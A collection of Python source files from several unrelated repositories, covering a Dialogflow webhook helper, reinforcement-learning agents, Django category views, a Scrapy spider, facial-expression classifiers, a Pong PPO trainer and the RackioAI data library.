def variable(nombre):
req = request.get_json(force=True)
if req.get('queryResult').get('parameters').get(nombre):
return req.get('queryResult').get('parameters').get(nombre)
else:
return ''
def origenes():
req = request.get_json(force=True)
if req.get("originalDetectIntentRequest").get("payload").get("source"):
return (req.get("originalDetectIntentRequest").get("payload").get("source").upper())
else:
frase = u'indefinido'
return frase.upper()
def texto():
req = request.get_json(force=True)
if req.get("queryResult").get("queryText"):
return req.get("queryResult").get("queryText")
else:
return ''
def imagen():
req = request.get_json(force=True)
if req.get("originalDetectIntentRequest").get("payload").get("data").get("message").get("attachments").get(0).get("payload").get("url"):
return req.get("originalDetectIntentRequest").get("payload").get("data").get("message").get("attachments").get(0).get("payload").get("url")
else:
return ''
def enviarimagenes(imagen,plataforma):
a='{"fulfillmentMessages":['
for img in imagen:
a=a+'{"image":{"imageUri":"'+img+'"},"platform":"'+plataforma+'"},'
a=a+'{"payload":{}}]}'
return a
def enviartarjetas(t,plataforma):
a='{"fulfillmentMessages": ['
con=1
for tit in t:
try:
a=a+'{"card": {"title": "'+tit[1]+'", "subtitle": "'+tit[2]+'", "imageUri": "'+tit[3]+'"'
a=a+', "buttons": [ { "text": "'+tit[0][0]+'"} '
con=2
a=a+', { "text": "'+tit[0][1]+'"} '
a=a+', { "text": "'+tit[0][1]+'"} '
a=a+']}, "platform": "'+plataforma+'"},'
except IndexError:
if con==1:
a=a+'}, "platform": "'+plataforma+'"},'
else:
a=a+']}, "platform": "'+plataforma+'"},'
a=a+'{"payload":{}}]}'
return a
def enviarrespuestasrapidas(repuestas,plataforma):
a='{ "fulfillmentMessages": [ { "quickReplies": { "title": "'+repuestas['titulo'][0]+'", "quickReplies": ['
b=repuestas['boton']
d=''
for c in b:
if d=='':
d=d+'"'+c+'"'
else:
d=d+',"'+c+'"'
a=a+d+']},"platform": "'+plataforma+'"},{"payload":{}}]}'
return a
```
|
{
"source": "jesuscast/tensorforce-clone",
"score": 2
}
|
#### File: tensorforce/agents/memory_agent.py
```python
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from six.moves import xrange
from tensorforce.agents import Agent
from tensorforce.core.memories import Memory
class MemoryAgent(Agent):
"""
The `MemoryAgent` class implements a replay memory from
which it samples batches to update the value function.
"""
def __init__(
self,
states_spec,
actions_spec,
preprocessing,
exploration,
reward_preprocessing,
batched_observe,
batch_size,
memory,
first_update,
update_frequency,
repeat_update
):
self.memory_spec = memory
self.batch_size = batch_size
self.first_update = first_update
self.update_frequency = update_frequency
self.repeat_update = repeat_update
super(MemoryAgent, self).__init__(
states_spec=states_spec,
actions_spec=actions_spec,
preprocessing=preprocessing,
exploration=exploration,
reward_preprocessing=reward_preprocessing,
batched_observe=batched_observe
)
self.memory = Memory.from_spec(
spec=self.memory_spec,
kwargs=dict(
states_spec=self.states_spec,
actions_spec=self.actions_spec
)
)
def observe(self, terminal, reward):
super(MemoryAgent, self).observe(terminal=terminal, reward=reward)
self.memory.add_observation(
states=self.current_states,
internals=self.current_internals,
actions=self.current_actions,
terminal=self.current_terminal,
reward=self.current_reward
)
if self.timestep >= self.first_update and self.timestep % self.update_frequency == 0:
for _ in xrange(self.repeat_update):
batch = self.memory.get_batch(batch_size=self.batch_size, next_states=True)
loss_per_instance = self.model.update(
states=batch['states'],
internals=batch['internals'],
actions=batch['actions'],
terminal=batch['terminal'],
reward=batch['reward'],
return_loss_per_instance=True
)
self.memory.update_batch(loss_per_instance=loss_per_instance)
def import_observations(self, observations):
"""Load an iterable of observation dicts into the replay memory.
Args:
observations: An iterable with each element containing an observation. Each
observation requires keys 'state','action','reward','terminal', 'internal'.
Use an empty list [] for 'internal' if internal state is irrelevant.
Returns:
"""
for observation in observations:
self.memory.add_observation(
states=observation['states'],
internals=observation['internals'],
actions=observation['actions'],
terminal=observation['terminal'],
reward=observation['reward']
)
```
#### File: tensorforce/models/q_nstep_model.py
```python
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from tensorforce import util
from tensorforce.models import QModel
class QNstepModel(QModel):
"""
Deep Q network using n-step rewards as decsribed in Asynchronous Methods for Reinforcement Learning.
"""
def tf_q_delta(self, q_value, next_q_value, terminal, reward):
for _ in range(util.rank(q_value) - 1):
terminal = tf.expand_dims(input=terminal, axis=1)
reward = tf.expand_dims(input=reward, axis=1)
multiples = (1,) + util.shape(q_value)[1:]
terminal = tf.tile(input=terminal, multiples=multiples)
reward = tf.tile(input=reward, multiples=multiples)
reward = self.fn_discounted_cumulative_reward(
terminal=terminal,
reward=reward,
discount=self.discount,
final_reward=next_q_value[-1]
)
return reward - q_value
```
|
{
"source": "jesuscfv/friction_less",
"score": 3
}
|
#### File: src/obj/physicalobject.py
```python
import pyglet
class PhysicalObject(pyglet.sprite.Sprite):
def __init__(self, *args, **kwargs):
super(PhysicalObject, self).__init__(*args, **kwargs)
# Velocities
self.v_x, self.v_y = 0.0, 0.0
# Positions
# self.x, self.y = 0.0, 0.0
def update(self, dt):
"""This method should be called every frame."""
# Update position according to velocity and time
self.x += self.v_x * dt
self.y += self.v_y * dt
```
|
{
"source": "jesuschm/tasca",
"score": 3
}
|
#### File: domain/users/user.py
```python
import uuid
from dataclasses import dataclass, asdict, field
@dataclass
class User():
username: str
id: uuid.UUID = field(default_factory=uuid.uuid4)
follows: list = field(default_factory=list)
@classmethod
def from_dict(self, d):
return self(**d) if isinstance(d, dict) else None
def to_dict(self):
return asdict(self)
def add_follow(self, follow_user_id):
self.follows.append(follow_user_id)
```
#### File: tasca/src/tasca.py
```python
import sys
import logging
from application.commands_service import post, read, follow, wall
from infra.databases.mongo import MongoRepository
_repo = MongoRepository()
_verbose = False
def main():
try:
command = None
if _repo.client:
logging.info("[+] Hello friend! Welcome to the Tasca. Get fun! ")
logging.info("[+] Control + C to exit.\n")
while command != "^C":
try:
command = str(input("> "))
# Posting command
if '->' in command:
data = command.split(" -> ")
if len(data) == 2:
post(_repo, username = data[0], message = data[1])
else:
logging.error("[-] Bad post command. Correct format: [username] -> [message].")
elif 'follows' in command:
data = command.split(" follows ")
if len(data) == 2:
user = data[0]
follow_user = data[1]
rc = follow(_repo, username = user, follow_username = follow_user)
if rc:
logging.debug(f"[+] {user} is now following {follow_user}.")
else:
logging.error(f"[-] Error trying to follow {follow_user}")
else:
logging.error("[-] Bad follow command. Correct format: [username] -> [username].")
elif 'wall' in command:
data = command.split(" wall")
if len(data) == 2 and data[1] == '':
wall(_repo, username = data[0])
else:
logging.error("[-] Bad wall command. Correct format: [username] wall.")
else:
data = command.split(" ")
if len(data) == 1:
read(_repo, username = command)
else:
logging.error("[-] Bad username to read. Usernames don't contain spaces.")
except Exception as e:
logging.error(f"[-] Error: {e}.")
else:
raise("Database not connected.")
except KeyboardInterrupt:
logging.info(f"\n[+] Quitting.. Bye!")
sys.exit(0)
except Exception as e:
logging.error(f"[-] Error: {e}. Quitting.")
sys.exit(1)
if __name__ == "__main__":
"""Entry point
"""
main()
```
|
{
"source": "jesuscol96/WebClassApp",
"score": 2
}
|
#### File: WebClassApp/categorias/views.py
```python
from django.shortcuts import render, get_object_or_404
from django.http import HttpResponse, HttpResponseRedirect
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from django.urls import reverse
from .models import Categories
from django.http import JsonResponse
from rest_framework.renderers import JSONRenderer
from rest_framework.parsers import JSONParser
from .serializers import *
# Create your views here.
def index(request):
if request.user.is_authenticated:
username = request.user.username
is_superuser = request.user.is_superuser
else:
username = 'none'
is_superuser = False
categorias = Categories.objects.all()
context = {
'is_user': request.user.is_authenticated,
'username': username,
'is_superuser' : is_superuser,
'categorias': categorias
}
return render(request,'categorias/index.html',context)
@login_required
def crear_categoria(request):
return render(request,'categorias/crear_categorias.html')
def delete_category(request,pk):
categoria = get_object_or_404(Categories,pk=pk)
if request.method == 'POST': # If method is POST,
categoria.delete() # delete the cat.
return HttpResponseRedirect(reverse('categorias:index'))
return render(request,'categorias/index.html')
def process_new_categories(request):
name = request.POST['name']
description = request.POST['description']
categoria= Categories(name=name,description=description,view_count=1)
categoria.save()
return HttpResponseRedirect(reverse('categorias:index'))
def ver_categoria(request,categoria_id):
if request.user.is_authenticated:
username = request.user.username
is_superuser = request.user.is_superuser
else:
username = 'none'
is_superuser = False
categoria=Categories.objects.get(id=categoria_id)
context = {
'is_user': request.user.is_authenticated,
'username': username,
'is_superuser' : is_superuser,
'categoria': categoria
}
return render(request,'categorias/ver_categoria.html',context)
#For flutter
def index_flutter(request):
if request.user.is_authenticated:
username = request.user.username
is_superuser = request.user.is_superuser
else:
username = 'none'
is_superuser = False
categorias = Categories.objects.all()
categorias = CategoriesSerializer(categorias,many=True)
context = {
'is_user': request.user.is_authenticated,
'username': username,
'is_superuser' : is_superuser,
'categorias': categorias.data
}
return JsonResponse(context,safe=False)
def delete_category_flutter(request):
pk = int(request.POST['pk'])
categoria = Categories.objects.filter(pk=pk)
if len(categoria) > 0:
categoria.first().delete()
return JsonResponse({'success': True},safe=False)
else:
return JsonResponse({'success': False},safe=False)
def process_new_categories_flutter(request):
name = request.POST['name']
description = request.POST['description']
categoria= Categories(name=name,description=description,view_count=1)
categoria.save()
return JsonResponse({'success': True})
def ver_categoria_flutter(request):
pk = int(request.POST['pk'])
if request.user.is_authenticated:
username = request.user.username
is_superuser = request.user.is_superuser
else:
username = 'none'
is_superuser = False
categoria=Categories.objects.filter(id=pk)
if len(categoria) > 0:
is_empty = False
else:
is_empty = True
categoria = CategoriesSerializer(categoria,many=True)
context = {
'is_user': request.user.is_authenticated,
'username': username,
'is_superuser' : is_superuser,
'categoria': categoria.data,
'is_empty': is_empty,
}
return JsonResponse(context,safe=False)
```
#### File: management/commands/seed.py
```python
from django.core.management.base import BaseCommand
from mainpage.models import Roles
# import UserFactory here
roles = ['Student','Instructor']
class Command(BaseCommand):
help = 'Seeds the database.'
def handle(self, *args, **options):
print('Seeding...')
for role in roles:
d = Roles(name=role)
d.save()
print('Roles have been seeded.')
```
|
{
"source": "JesusContrerasPacheco/IA_Recognition_Expressions",
"score": 3
}
|
#### File: JesusContrerasPacheco/IA_Recognition_Expressions/predict3.py
```python
import os
import numpy as np
import cv2 as cv2
import glob
from sklearn.multiclass import OneVsRestClassifier
from sklearn.svm import SVC
import pickle
import pandas as pd
data = { 'ID':[], 'USER': [], 'PREDICT': [] }
path = 'E:/UPC/Inteleigencia Artificial/IA_Recognition_Expressions-main/'
path_img = 'E:/UPC/Inteleigencia Artificial/IA_Recognition_Expressions-main/testImages/'
#rutimg = str(input("Coloca la ruta de la imagen:"))
files_names = os.listdir(path_img)
#print(files_names)
# def returnLocalizedFace(img):
# face_cascade = cv2.CascadeClassifier(path + 'classifiers/haarcascade_frontalface_default.xml')
# gray =cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# faces = face_cascade.detectMultiScale(gray, 1.3, 5)
# for (x, y, w, h) in faces:
# # roi_gray = gray[y:y + h, x:x + w]
# # roi_color = img[y:y + h, x:x + w]
# if len(faces) == 0:
# return img
# crop_img = img[y:y + h, x:x + w]
# return crop_img
def getImage(path_img):
return cv2.imread(path_img)
# for files_name in files_names:
# image = cv2.imread(path_img +"/"+files_name)
# return image
#print(getImage(path_img))
def show(img):
cv2.imshow('im', img)
# cv2.waitKey(0)
X = []
y = []
def read(imageFolder, label):
for filename in glob.glob(path + "images/" + imageFolder + '/*.*'):
win_size = (64, 128)
img = getImage(filename)
win_size = (64, 128)
img = cv2.resize(img, win_size)
img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
d = cv2.HOGDescriptor()
hog = d.compute(img)
X.append(hog.transpose()[0])
y.append(label)
# def fromIndexToFeatures(X, indecies):
# features = []ads
# for i in indecies:
# features.append(X[i])
# return np.asarray(features)
# def fromIndexToLabels(y, indecies):
# labels = []
# for i in indecies:
# labels.append(y[i])
# return np.asarray(labels)
def openModal(img):
image_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
face_cascade = cv2.CascadeClassifier(path + "classifiers/haarcascade_frontalface_alt2.xml")
faces = face_cascade.detectMultiScale(image_gray)
landmark_detector = cv2.face.createFacemarkLBF()
landmark_detector.loadModel(path + "classifiers/LFBmodel.yaml")
_, landmarks = landmark_detector.fit(image_gray, faces)
for landmark in landmarks:
for x,y in landmark[0]:
cv2.circle(img, (int(x), int(y)), 1, (255, 255, 255), 1)
# show(img)
read('HAPPY',0)
read('CONTEMPT',1)
read('ANGER',2)
read('DISGUST',3)
read('FEAR',4)
read('SADNESS',5)
read('SURPRISE',6)
read('NEUTRAL',7)
classes = ["HAPPY", "CONTEMPT", "ANGER", "DISGUSTADO", "FEAR", "SADNESS", "SURPRISE", "NEUTRAL"]
y = np.asarray(y)
X = np.asarray(X)
clf = OneVsRestClassifier(SVC(kernel='linear', probability=True, tol=1e-3))
clf.fit(X, y)
filename = 'finalized_model.sav'
pickle.dump(clf, open(filename, 'wb'))
clf = pickle.load(open(filename, 'rb'))
#img = getImage(path_img)
#path + 'testImages/angry.jpg'
# points
#print (img)
win_size = (64, 128)
"""
img = cv2.resize(img, win_size)
img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
d = cv2.HOGDescriptor()
hog = d.compute(img)
hog = hog.transpose()[0]
hog = np.asarray(hog)
print(hog)
"""
id = 0
for files_name in files_names:
#print(files_name)
id = id +1
data["ID"].append(id)
data["USER"].append(files_name)
image_path = path_img + files_name
img = getImage(image_path)
if img is None:
continue
# openModal(img)
# show(img)
img = cv2.resize(img, win_size)
img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
d = cv2.HOGDescriptor()
hog = d.compute(img)
hog = hog.transpose()[0]
hog = np.asarray(hog)
print(hog)
result = classes[clf.predict([hog])[0]]
print("Result: " + result)
data["PREDICT"].append(result)
cv2.waitKey(0)
cv2.destroyAllWindows()
df = pd.DataFrame(data, columns = ['ID', 'USER', 'Nivel Sentimiento(+)' ,'Nivel Sentimiento(-)', 'PREDICT'])
df.to_excel(path + "export.xlsx", index = False, header=True)
```
#### File: JesusContrerasPacheco/IA_Recognition_Expressions/predict.py
```python
import numpy as np
import cv2 as cv2
import glob
from sklearn.multiclass import OneVsRestClassifier
from sklearn.svm import SVC
import pickle
path = 'D:/UPC/2021 - 1/IA/proyecto/IA_Recognition_Expressions/'
# def returnLocalizedFace(img):
# face_cascade = cv2.CascadeClassifier(path + 'classifiers/haarcascade_frontalface_default.xml')
# gray =cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
# faces = face_cascade.detectMultiScale(gray, 1.3, 5)
# for (x, y, w, h) in faces:
# # roi_gray = gray[y:y + h, x:x + w]
# # roi_color = img[y:y + h, x:x + w]
# if len(faces) == 0:
# return img
# crop_img = img[y:y + h, x:x + w]
# return crop_img
def getImage(path):
return cv2.imread(path)
def show(img):
cv2.imshow('im', img)
# cv2.waitKey(0)
X = []
y = []
def read(imageFolder, label):
for filename in glob.glob(path + "images/" + imageFolder + '/*.*'):
win_size = (64, 128)
img = getImage(filename)
win_size = (64, 128)
img = cv2.resize(img, win_size)
img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
d = cv2.HOGDescriptor()
hog = d.compute(img)
X.append(hog.transpose()[0])
y.append(label)
# def fromIndexToFeatures(X, indecies):
# features = []
# for i in indecies:
# features.append(X[i])
# return np.asarray(features)
# def fromIndexToLabels(y, indecies):
# labels = []
# for i in indecies:
# labels.append(y[i])
# return np.asarray(labels)
def openModal(img):
image_gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
face_cascade = cv2.CascadeClassifier(path + "classifiers/haarcascade_frontalface_alt2.xml")
faces = face_cascade.detectMultiScale(image_gray)
landmark_detector = cv2.face.createFacemarkLBF()
landmark_detector.loadModel(path + "classifiers/LFBmodel.yaml")
_, landmarks = landmark_detector.fit(image_gray, faces)
for landmark in landmarks:
for x,y in landmark[0]:
cv2.circle(img, (int(x), int(y)), 1, (255, 255, 255), 1)
show(img)
read('HAPPY',0)
read('CONTEMPT',1)
read('ANGER',2)
read('DISGUST',3)
read('FEAR',4)
read('SADNESS',5)
read('SURPRISE',6)
read('NEUTRAL',7)
classes = ["HAPPY", "CONTEMPT", "ANGER", "DISGUST", "FEAR", "SADNESS", "SURPRISE", "NEUTRAL"]
y = np.asarray(y)
X = np.asarray(X)
clf = OneVsRestClassifier(SVC(kernel='linear', probability=True, tol=1e-3))
clf.fit(X, y)
filename = 'finalized_model.sav'
pickle.dump(clf, open(filename, 'wb'))
clf = pickle.load(open(filename, 'rb'))
img = getImage(path + 'testImages/happy2.PNG')
# points
openModal(img)
win_size = (64, 128)
img = cv2.resize(img, win_size)
img = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
d = cv2.HOGDescriptor()
hog = d.compute(img)
hog = hog.transpose()[0]
hog = np.asarray(hog)
print(hog)
print("Result: " + classes[clf.predict([hog])[0]])
cv2.waitKey(0)
```
|
{
"source": "jesuscopado/RL-pong-project",
"score": 3
}
|
#### File: test_agents/PGAgent/agent.py
```python
import numpy as np
import torch
import torch.nn.functional as F
from torch.distributions import Categorical
from utils import discount_rewards
class PolicyConv(torch.nn.Module):
def __init__(self, action_space, hidden=64):
super().__init__()
self.action_space = action_space
self.hidden = hidden
self.conv1 = torch.nn.Conv2d(2, 32, 3, 2)
self.conv2 = torch.nn.Conv2d(32, 64, 3, 2)
self.conv3 = torch.nn.Conv2d(64, 128, 3, 2)
self.reshaped_size = 128 * 11 * 11
self.fc1 = torch.nn.Linear(self.reshaped_size, self.hidden)
self.fc2_mean = torch.nn.Linear(self.hidden, action_space)
self.init_weights()
def init_weights(self):
for m in self.modules():
if type(m) is torch.nn.Linear:
torch.nn.init.uniform_(m.weight)
torch.nn.init.zeros_(m.bias)
elif type(m) is torch.nn.Conv2d:
torch.nn.init.xavier_normal_(m.weight.data)
if m.bias is not None:
torch.nn.init.normal_(m.bias.data)
def forward(self, x):
x = self.conv1(x)
x = F.relu(x)
x = self.conv2(x)
x = F.relu(x)
x = self.conv3(x)
x = F.relu(x)
x = x.reshape(-1, self.reshaped_size)
x_ac = self.fc1(x)
x_ac = F.relu(x_ac)
x_mean = self.fc2_mean(x_ac)
x_probs = F.softmax(x_mean, dim=-1)
dist = Categorical(x_probs)
return dist
class Agent(object):
def __init__(self, train_device="cuda"):
self.train_device = train_device
self.policy = PolicyConv(3, 128).to(self.train_device)
self.optimizer = torch.optim.RMSprop(self.policy.parameters(), lr=5e-3)
self.gamma = 0.99
self.batch_size = 100
self.prev_obs = None
self.states = []
self.log_act_probs = []
self.rewards = []
def replace_policy(self):
self.old_policy.load_state_dict(self.policy.state_dict())
def get_action(self, observation, evaluation=False):
x = self.preprocess(observation).to(self.train_device)
dist = self.policy.forward(x)
if evaluation:
action = torch.argmax(dist.probs)
else:
action = dist.sample()
# Calculate the log probability of the action
log_act_prob = -dist.log_prob(action) # negative in order to perform gradient ascent
return action.item(), log_act_prob
def episode_finished(self, episode_number):
log_act_probs = torch.stack(self.log_act_probs, dim=0)\
.to(self.train_device).squeeze(-1)
rewards = torch.stack(self.rewards, dim=0)\
.to(self.train_device).squeeze(-1)
self.states, self.log_act_probs, self.rewards = [], [], []
# Compute discounted rewards and normalize it to zero mean and unit variance
discounted_rewards = discount_rewards(rewards, self.gamma)
discounted_rewards -= torch.mean(discounted_rewards)
discounted_rewards /= torch.std(discounted_rewards)
weighted_probs = log_act_probs * discounted_rewards
loss = torch.mean(weighted_probs)
loss.backward()
self.reset()
if (episode_number+1) % self.batch_size == 0:
self.update_policy()
def update_policy(self):
self.optimizer.step()
self.optimizer.zero_grad()
def reset(self):
self.prev_obs = None
def get_name(self):
return "PGAgent"
def load_model(self):
weights = torch.load("model.mdl")
self.policy.load_state_dict(weights, strict=False)
def preprocess(self, observation):
observation = observation[::2, ::2].mean(axis=-1)
observation = np.expand_dims(observation, axis=-1)
if self.prev_obs is None:
self.prev_obs = observation
stack_ob = np.concatenate((self.prev_obs, observation), axis=-1)
stack_ob = torch.from_numpy(stack_ob).float().unsqueeze(0)
stack_ob = stack_ob.transpose(1, 3)
self.prev_obs = observation
return stack_ob
def store_outcome(self, observation, log_act_prob, action_taken, reward, done):
self.states.append(observation)
self.log_act_probs.append(log_act_prob)
self.rewards.append(torch.tensor([float(reward)]))
```
#### File: jesuscopado/RL-pong-project/train_ppo.py
```python
import argparse
import time
import gym
import torch
import numpy as np
from DaBomb.agent import Agent as PPOAgent
from utils import save_plot
import wimblepong
# Make the environment
env = gym.make("WimblepongVisualSimpleAI-v0")
# Set up the player here. We used the SimpleAI that does not take actions for now
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
player = PPOAgent(device)
def train(episodes_batch=200, iterations=100000, max_timesteps=190000,
render=False, resume=False, full_print=True):
if resume:
player.load_model(evaluation=False)
print("Training for {} started!".format(player.get_name()))
win_ratio_history, average_win_ratio_history = [], [] # within the batch of episodes
wins, total_episodes = 0, 0
start_time = time.time()
reward_sum_running_avg = None
for it in range(iterations):
stack_obs_history, action_history, action_prob_history, reward_history = [], [], [], []
for ep in range(episodes_batch):
obs1 = env.reset()
player.reset()
total_episodes += 1
for t in range(max_timesteps):
if render:
env.render()
with torch.no_grad():
action1, action_prob1, stack_obs = player.get_action(obs1, evaluation=False)
obs1, reward1, done, info = env.step(action1)
stack_obs_history.append(stack_obs)
action_history.append(player.revert_action_convertion(action1))
action_prob_history.append(action_prob1)
reward_history.append(reward1)
if done:
wins = wins + 1 if reward1 == 10 else wins
if full_print:
reward_sum = sum(reward_history[-t:])
if reward_sum_running_avg:
reward_sum_running_avg = 0.99 * reward_sum_running_avg + 0.01 * reward_sum
else:
reward_sum_running_avg = reward_sum
print('Iteration %d, Episode %d (%d timesteps) - '
'last_action: %d, last_action_prob: %.2f, result: %s, running_avg: %.2f' %
(it, ep, t, action1, action_prob1,
"¡¡VICTORY!!" if reward1 == 10 else "defeat", reward_sum_running_avg))
break
player.update_policy(stack_obs_history, action_history, action_prob_history, reward_history)
# Bookkeeping (mainly for generating plots)
win_ratio = int((wins / episodes_batch) * 100)
win_ratio_history.append(win_ratio)
avg = np.mean(win_ratio_history[-100:])
average_win_ratio_history.append(avg)
print("Total episodes: {}. Win ratio (last episodes batch): {}%. Average win ratio: {}%".format(
total_episodes, win_ratio, round(float(avg), 2)))
wins = 0
if it % 10 == 0:
player.save_model(it)
save_plot(win_ratio_history, average_win_ratio_history, player.get_name(), episodes_batch, it)
elapsed_time_min = round((time.time() - start_time) / 60, 2)
player.save_model(it)
save_plot(win_ratio_history, average_win_ratio_history, player.get_name(), episodes_batch)
print("Training finished in %f minutes." % elapsed_time_min)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("--resume", action="store_true", help="Resume training.")
args = parser.parse_args()
train(resume=True if args.resume else False)
```
|
{
"source": "JesusCoyotzi/SparseMapper",
"score": 2
}
|
#### File: sparse_map_server/scripts/navGoal.py
```python
import rospy
from geometry_msgs.msg import PoseStamped
from geometry_msgs.msg import PoseWithCovarianceStamped
from geometry_msgs.msg import Point
from nav_msgs.msg import Path
from nav_msgs.srv import GetPlan
start = PoseStamped()
def goalCallback(msg):
goal = msg
try:
goalProxy = rospy.ServiceProxy("/move_base/make_plan", GetPlan)
pth = goalProxy(start, goal,0.3)
print("NavStack path planing succesfull")
for p in pth.plan.poses:
print((p.pose.position.x,p.pose.position.y,p.pose.position.z))
except rospy.ServiceException as e:
print("Service call failed %s"%e)
def startCallBack(msg):
global start
start = PoseStamped(msg.header,msg.pose.pose)
#print(msg)
def setup():
rospy.init_node("goal_emitter", anonymous=False)
rospy.Subscriber("/move_base_simple/goal", PoseStamped, goalCallback)
rospy.Subscriber("/initialpose", PoseWithCovarianceStamped, startCallBack)
rospy.wait_for_service("/move_base/make_plan")
rospy.spin()
if __name__ == '__main__':
setup()
```
|
{
"source": "JesusCuentasVillanueva/curso_profesional_python",
"score": 4
}
|
#### File: JesusCuentasVillanueva/curso_profesional_python/division_by.py
```python
def division_by(a):
def numero(b):
assert type(b) == int, "Error, debes usar numeros enteros"
return b//a
return numero
def run():
division_by_3 = division_by(3)
print(division_by_3(18))
division_by_5 = division_by(5)
print(division_by_5(100))
division_by_18 = division_by(18)
print(division_by_18(54))
#error_prueba = division_by(10)
#print(error_prueba(100.2))
if __name__ == "__main__":
run()
```
#### File: JesusCuentasVillanueva/curso_profesional_python/primo.py
```python
def primo(numero: int) -> bool:
divisores = []
for divisor in range(1,numero+1):
if numero % divisor == 0:
divisores.append(divisor)
else:
continue
if len(divisores)>2 or numero==1:
return False
else:
return True
def main():
numero = int(input("Introduce un número: "))
resultado = primo(numero)
if resultado == True:
print(f"El numero {numero} es primo")
else:
print(f"El numero {numero} NO es primo")
if __name__ == "__main__":
main()
```
#### File: JesusCuentasVillanueva/curso_profesional_python/sets.py
```python
def remove_duplicates(some_list):
without_duplicates = []
for element in some_list:
if element not in without_duplicates:
without_duplicates.append(element)
return without_duplicates
def remove_duplicates_with_sets(some_list):
return list(set(some_list))
def run():
random_list = [1, 2, 2, 2, 3, "Platzi", "Platzi", True, 4.6, False]
print(remove_duplicates_with_sets(random_list))
#INTERESANTE
#En el resultado no se imprime True porque python lo interpreta como un 1, y como ya existe lo omite.
#Para python True es lo mismo que 1 (True = 1)
if __name__ == '__main__':
run()
```
|
{
"source": "jesuscuesta/Python",
"score": 3
}
|
#### File: detalle/spiders/cogefotos.py
```python
import re
from scrapy.selector import HtmlXPathSelector
from scrapy.contrib.linkextractors.sgml import SgmlLinkExtractor
from scrapy.contrib.spiders import CrawlSpider, Rule
from detalle.items import DetalleItem
import urllib
filename = 'lista.txt'
class CogefotosSpider(CrawlSpider):
name = 'cogefotos'
allowed_domains = ['tucamon.es']
start_urls = []
# Leemos nuestro archivo que contiene las urls listadas
f = open(filename).read()
for linea in f.split('\n'):
if linea != '':
# Agregamos cada link a las urls a examinar
start_urls.append("http://www.tucamon.es" + linea)
def parse(self, response):
hxs = HtmlXPathSelector(response)
sites = hxs.select('//html')
items = []
for site in sites:
item = DetalleItem()
item['titulo'] = site.select("//head/title/text()").extract()
item['foto'] = site.select("//div[@class='photo_container photo_align_center']/img[1]/@src").extract()
item['descripcion'] = site.select("//div[@id='content']/p[2]").extract()
item['fecha'] = site.select("//div[@id='content']/p[3]").extract()
item['hora'] = site.select("//div[@id='content']/p[4]").extract()
items.append(item)
return items
CogefotosSpider()
```
|
{
"source": "JesusDBS/RackioAI",
"score": 2
}
|
#### File: RackioAI/rackio_AI/core.py
```python
import os
import pickle
from pickle import HIGHEST_PROTOCOL
import numpy as np
import pandas as pd
import doctest
from rackio_AI._singleton import Singleton
from rackio_AI.managers import DataAnalysisManager
from rackio_AI.managers import ModelsManager
from rackio_AI.managers import PreprocessManager
from rackio_AI.readers import Reader
from rackio_AI.utils.utils_core import Utils
class RackioAI(Singleton):
"""
This is the main class of the package.
**RackioAI** is an open source, MIT License [Rackio-Framework](https://github.com/rack-io/rackio-framework) extension
to do data analysis (based on [Pandas](https://pandas.pydata.org/)) and deep learning models (based on [Keras](https://keras.io/))
taking advantage of **Rackio** system architecture.
You can use it by the following snippet code:
```python
>>> from rackio_AI import RackioAI
```
"""
def __init__(self):
super(RackioAI, self).__init__()
self.reader = Reader()
self._preprocessing_manager = PreprocessManager()
self._data_analysis_manager = DataAnalysisManager()
self._models_manager = ModelsManager()
self.app = None
def __call__(self, app):
"""
:param app:
:return:
"""
self.app = app
def load(self, pathname: str, ext: str=".tpl", reset_index=False, **kwargs):
"""
Load data into DataFrame format:
* **.tpl:** Is an [OLGA](https://www.petromehras.com/petroleum-software-directory/production-engineering-software/olga-dynamic-multiphase-flow-simulator)
extension file.
* **.pkl:** Numpy arrays or Pandas.DataFrame saved in pickle format.
___
**Parameters**
* **:param pathname:** (str) Filename or directory.
* If the *pathname* is a directory, it will load all the files with extension *ext*.
* If the *pathname* is a filename, it will load the file with a supported extension.
* **:param ext:** (str) filename extension, it's necessary if pathname is a directory.
Extensions supported are:
* *.tpl* [OLGA](https://www.petromehras.com/petroleum-software-directory/production-engineering-software/olga-dynamic-multiphase-flow-simulator)
extension file.
* *.xls*
* *.xlsx*
* *.xlsm*
* *.xlsb*
* *.odf*
* *.ods*
* *.odt*
* *.csv*
* *.pkl* (Only if the pkl saved is a DataFrame)
**:return:**
* **data:** (pandas.DataFrame)
___
## Snippet code
```python
>>> import os
>>> from rackio_AI import RackioAI, get_directory
>>> filename = os.path.join(get_directory('Leak'), 'Leak01.tpl')
>>> df = RackioAI.load(filename)
>>> print(df.head())
tag TIME_SERIES PT_SECTION_BRANCH_TUBERIA_PIPE_Pipe60_NR_1 ... CONTR_CONTROLLER_CONTROL_FUGA file
variable Pressure ... Controller_output filename
unit S PA ... .tpl
0 0.000000 568097.3 ... 0.0 Leak01
1 0.502732 568098.2 ... 0.0 Leak01
2 1.232772 568783.2 ... 0.0 Leak01
3 1.653696 569367.3 ... 0.0 Leak01
4 2.200430 569933.5 ... 0.0 Leak01
<BLANKLINE>
[5 rows x 12 columns]
**Example loading a directory with .tpl files**
>>> directory = os.path.join(get_directory('Leak'))
>>> df = RackioAI.load(directory)
>>> print(df.head())
tag TIME_SERIES PT_SECTION_BRANCH_TUBERIA_PIPE_Pipe60_NR_1 ... CONTR_CONTROLLER_CONTROL_FUGA file
variable Pressure ... Controller_output filename
unit S PA ... .tpl
0 0.000000 568097.3 ... 0.0 Leak01
1 0.502732 568098.2 ... 0.0 Leak01
2 1.232772 568783.2 ... 0.0 Leak01
3 1.653696 569367.3 ... 0.0 Leak01
4 2.200430 569933.5 ... 0.0 Leak01
<BLANKLINE>
[5 rows x 12 columns]
**Example loading a directory with .csv files**
>>> directory = os.path.join(get_directory('csv'), "Hysys")
